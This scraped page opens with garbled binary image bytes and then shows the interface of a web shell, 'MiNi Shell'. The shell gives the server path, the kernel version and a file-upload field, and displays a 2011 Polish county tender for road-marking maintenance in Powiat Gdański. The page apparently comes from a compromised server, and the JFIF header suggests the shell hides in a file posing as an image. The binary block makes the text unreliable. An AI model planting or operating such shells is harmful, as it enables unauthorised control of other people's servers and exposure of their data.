JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110310/78993-N-2011.html

<p class="kh_header"><b>Pruszcz Gdański: Wykonanie usługi związanej z utrzymaniem oznakowania polegającego  na:  oznakowaniu  pionowym,  oznakowaniu  poziomym  dróg  powiatowych położonych na terenie Powiatu Gdańskiego w 2011 r.</b><br>
<b>Numer ogłoszenia: 78993 - 2011; data zamieszczenia: 10.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi związanej z utrzymaniem oznakowania polegającego  na:  oznakowaniu  pionowym,  oznakowaniu  poziomym  dróg  powiatowych położonych na terenie Powiatu Gdańskiego w 2011 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia  jest  wykonanie  usługi  związanej  z utrzymaniem oznakowania  polegającego  na:  oznakowaniu  pionowym,  oznakowaniu  poziomym   dróg powiatowych położonych na terenie Powiatu Gdańskiego w 2011 r.
2.Zakresem przedmiotu zamówienia jest:
ZADANIE NR 1 - OZNAKOWANIE PIONOWE 
Zakres robót i usług obejmuje:
- zakupienie  znaków  drogowych, słupków i obejm do mocowania znaków: wymiary znaków drogowych  -  grupa  wielkości  znaków  średnie, liternictwo, symbole i kolorystyka i inne wg Rozporządzenia na koszt Wykonawcy;
- wykonanie konstrukcji do znaków drogowych;
- ustawienie słupków do znaków;
- zamocowanie tablic znaków drogowych;
- ustawienie słupków z rur stalowych fi 70 mm;
- przymocowanie tablic znaków drogowych do słupków lub masztów.
Znak pionowy - znak wykonany w postaci tarczy lub tablicy z napisami albo symbolami, zwykle umieszczony na konstrukcji wsporczej.
Tarcza znaku - element konstrukcyjny, na powierzchni, którego umieszczana jest treść znaku.
Tarcza może być wykonana z różnych materiałów (stal, aluminium, tworzywa syntetyczne itp.) - jako jednolita lub składana.
Producent zakupionych materiałów tj. znaków drogowych winien posiadać:
- certyfikat  uprawniający   do   oznakowania   wyrobów   znakiem   bezpieczeństwa  B dla  znaków   drogowych   pionowych   nie  odblaskowych  i  odblaskowych  wydany przez Instytut Transportu Samochodowego,
- świadectwo  kwalifikacji  dot.  produkcji  znaków  i  tablic  drogowych   oraz  wykonywania pionowego oznakowania dróg wydane przez Instytut Badawczy Dróg i Mostów.
Przed przystąpieniem do robót Wykonawca jest zobowiązany do oznakowania rejonu robót  zgodnie z Rozporządzeniem.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac. 
Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 8A do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5A do niniejszej specyfikacji.
Zamawiający  zastrzega sobie możliwość zmiany ilości poszczególnych pozycji oznakowania pionowego w zależności od potrzeb bieżących przy zachowaniu ogólnej kwoty umownej.
UWAGA:
W przypadku uszkodzenia oznakowania pionowego, stwarzającego sytuację zagrożenia bezpieczeństwa ruchu drogowego, Wykonawca winien je naprawić lub wymienić w ciągu 24 h od zgłoszenia telefonicznego przez Zamawiającego.

ZADANIE NR 2 - OZNAKOWANIE POZIOME
Oznakowanie poziome - znaki drogowe poziome, umieszczone na nawierzchni w postaci linii ciągłych lub przerywanych, pojedynczych lub podwójnych, strzałek, napisów, symboli oraz innych linii związanych z oznaczeniem określonych miejsc na tej nawierzchni.
Zakres robót i usług obejmuje:
- Malowanie mechaniczne /odnawianie /cienkowarstwowo/ linii segregacyjnych 
i krawędziowych ciągłych, przerywanych, linii na przejściach dla pieszych, strzałek i innych znaków  w ilości do 5.000 m2. Materiałami do znakowania są przede wszystkim farby  jednoskładnikowe rozpuszczalnikowe, farby typu HS - high solid, farby wodorozcieńczalne, farby szybkoschnące, farby dwuskładnikowe chemoutwardzalne nakładane warstwą grubości od 0,3 mm do 0,8 mm (na mokro).
- Malowanie mechaniczne /odnawianie/ grubowarstwowo linii ciągłych,  strzałek i innych znaków,  przerywanych, linii na przejściach dla pieszych w ilości do 50 m2. Materiałami do znakowania  powinny  być  materiały  umożliwiające    nakładanie    ich warstwą   grubości 
od 0,9 mm do 5 mm, jak masy chemoutwardzalne stosowane na zimno oraz masy termoplastyczne. 
Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 8B do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5B do niniejszej specyfikacji.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac.
UWAGA:
Zamawiający zastrzega sobie możliwość zmniejszenie zakresu przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie  z  art. 36  ust. 2,  pkt.  3  ustawy,  Zamawiający  przewiduje  możliwość  udzielenia w okresie trwania umowy ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8, 45.23.32.21-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się prowadzeniem działalności gospodarczej w zakresie związanym z utrzymaniem oznakowania pionowego    i poziomego (wymianie/montażu/naprawie oznakowania).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się wykonaniem w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy  -  tym okresie, minimum 2 usług odpowiadających swym rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj.:  utrzymaniu oznakowania pionowego (zad. nr 1) (wymianie/montażu/naprawie oznakowania)  i poziomego (zad. nr 2) - o wartości minimum 50.000,00 zł każda wraz z dokumentami potwierdzającymi należyte wykonanie tych usług, (wzór załączniki nr 6 A i nr 6B do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się dysponowaniem co najmniej 1 pracownikiem, który będzie wykonywać zamówienie i który:
Posiada doświadczenie (praktykę) w zakresie prac związanych z utrzymaniem oznakowania pionowego i poziomego (wymianie/ montażu/ naprawie oznakowania). 
Powinna dołączyć kserokopię posiadanych uprawnień do prowadzenia usługi/robót, będącym przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (wzór zał. nr 1A, 1B do SIWZ),
2. Formularz cenowy (wzór zał. nr 4A, 4B do SIWZ), 
3. Podpisany wzór umowy (załącznik nr 5A, 5B do SIWZ),
4.Wykaz wykonanych usług (zał. nr  6 A, 6B do SIWZ),
5. wykaz  osób,  które  będą  wykonywać  zamówienie,  potencjał  kadrowy  (zał.  nr  7  do  SIWZ.
UWAGA:
Jako dodatkowy dokument należy dołączyć  aktualny odpis z ewidencji działalności gospodarczej - w przypadku Wykonawców prowadzących jednoosobową działalność gospodarczą lub wspólników spółki cywilnej. Załączony do oferty wypis będzie miał na celu potwierdzenie, iż osoby podpisujące ofertę lub pełnomocnictwo, posiadają uprawnienia do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja nieodpłatna  -  ewentualne koszty przesyłki 11,90 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2011 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi związanej z utrzymaniem oznakowania polegającego   na:  oznakowaniu  pionowym,  oznakowaniu  poziomym  dróg  powiatowych położonych na terenie Powiatu Gdańskiego w 2011 r.- zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 - OZNAKOWANIE PIONOWE 
Zakres robót i usług obejmuje:
- zakupienie  znaków  drogowych, słupków i obejm do mocowania znaków: wymiary znaków  drogowych  -  grupa  wielkości  znaków  średnie, liternictwo, symbole i kolorystyka i inne wg Rozporządzenia na koszt Wykonawcy;
- wykonanie konstrukcji do znaków drogowych;
- ustawienie słupków do znaków;
- zamocowanie tablic znaków drogowych;
- ustawienie słupków z rur stalowych fi 70 mm;
- przymocowanie tablic znaków drogowych do słupków lub masztów.

Znak pionowy - znak wykonany w postaci tarczy lub tablicy z napisami albo symbolami, zwykle umieszczony na konstrukcji wsporczej.

Tarcza znaku - element konstrukcyjny, na powierzchni, którego umieszczana jest treść znaku.
Tarcza może być wykonana z różnych materiałów (stal, aluminium, tworzywa syntetyczne itp.) - jako jednolita lub składana.
Producent zakupionych materiałów tj. znaków drogowych winien posiadać:
- certyfikat  uprawniający   do   oznakowania   wyrobów   znakiem   bezpieczeństwa  B 
 dla  znaków   drogowych   pionowych   nie  odblaskowych  i  odblaskowych  wydany przez Instytut Transportu Samochodowego,
- świadectwo  kwalifikacji  dot.  produkcji  znaków  i  tablic  drogowych   oraz  wykonywania pionowego oznakowania dróg wydane przez Instytut Badawczy Dróg i Mostów.
Przed przystąpieniem do robót Wykonawca jest zobowiązany do oznakowania rejonu robót  zgodnie z Rozporządzeniem.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac. 
Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 8A do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5A do niniejszej specyfikacji.
Zamawiający  zastrzega sobie możliwość zmiany ilości poszczególnych pozycji oznakowania pionowego w zależności od potrzeb bieżących przy zachowaniu ogólnej kwoty umownej.
UWAGA:
W przypadku uszkodzenia oznakowania pionowego, stwarzającego sytuację zagrożenia bezpieczeństwa ruchu drogowego, Wykonawca winien je naprawić lub wymienić w ciągu 24 h od zgłoszenia telefonicznego przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie usługi związanej z utrzymaniem oznakowania polegającego   na:  oznakowaniu  pionowym,  oznakowaniu  poziomym  dróg  powiatowych położonych na terenie Powiatu Gdańskiego w 2011 r. zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 - OZNAKOWANIE POZIOME
Oznakowanie poziome - znaki drogowe poziome, umieszczone na nawierzchni w postaci linii ciągłych lub przerywanych, pojedynczych lub podwójnych, strzałek, napisów, symboli oraz innych linii związanych z oznaczeniem określonych miejsc na tej nawierzchni.
Zakres robót i usług obejmuje:
- Malowanie mechaniczne /odnawianie /cienkowarstwowo/ linii segregacyjnych 
i krawędziowych ciągłych, przerywanych, linii na przejściach dla pieszych, strzałek i innych znaków  w ilości do 5.000 m2. Materiałami do znakowania są przede wszystkim farby  jednoskładnikowe rozpuszczalnikowe, farby typu HS - high solid, farby wodorozcieńczalne, farby szybkoschnące, farby dwuskładnikowe chemoutwardzalne nakładane warstwą grubości od 0,3 mm do 0,8 mm (na mokro).
- Malowanie mechaniczne /odnawianie/ grubowarstwowo linii ciągłych,  strzałek i innych znaków,  przerywanych, linii na przejściach dla pieszych w ilości do 50 m2. Materiałami do znakowania  powinny  być  materiały  umożliwiające    nakładanie    ich  warstwą   grubości od 0,9 mm do 5 mm, jak masy chemoutwardzalne stosowane na zimno oraz masy termoplastyczne. 
Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 8B do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5B do niniejszej specyfikacji.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac.
UWAGA:
Zamawiający zastrzega sobie możliwość zmniejszenie zakresu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com